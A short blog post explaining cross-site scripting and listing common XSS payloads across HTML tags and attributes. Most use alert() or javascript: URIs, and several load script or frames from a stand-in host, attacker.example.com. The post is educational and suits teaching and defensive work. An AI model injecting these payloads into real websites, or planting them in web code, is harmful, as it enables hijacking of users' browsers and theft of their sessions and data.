Andrew's Blog

What is cross-site scripting?

Cross-site scripting (XSS) is a web vulnerability that lets a malicious hacker introduce (inject) undesired commands into legitimate client-side code (usually JavaScript) executed by a browser on behalf of the web application.

XSS attack vectors

Common JavaScript language elements used in malicious payloads to perform cross-site scripting attacks include:

The <script> tag:
<script src=http://attacker.example.com/xss.js></script>
<script> alert("XSS");</script>
The onload and onerror attributes:
<img src=x onerror=alert("XSS")>
<body onload=alert("XSS")>
The <body> tag attributes:
<body background="javascript:alert("XSS")">
The <img> tag attributes:
<img src="javascript:alert("XSS");">
<img dynsrc="javascript:alert('XSS')">
<img lowsrc="javascript:alert('XSS')">
The <iframe> tag:
<iframe src="http://attacker.example.com/xss.html">
The <input> tag attributes:
<input type="image" src="javascript:alert('XSS');">
The <link> tag:
<link rel="stylesheet" href="javascript:alert('XSS');">
The <table> and <td> tag attributes:
<table background="javascript:alert('XSS')">
<td background="javascript:alert('XSS')">
The <div> tag attributes:
<div style="background-image: url(javascript:alert('XSS'))">
<div style="width: expression(alert('XSS'));">
The <object> tag:
<object type="text/x-scriptlet" data="http://attacker.example.com/xss.html">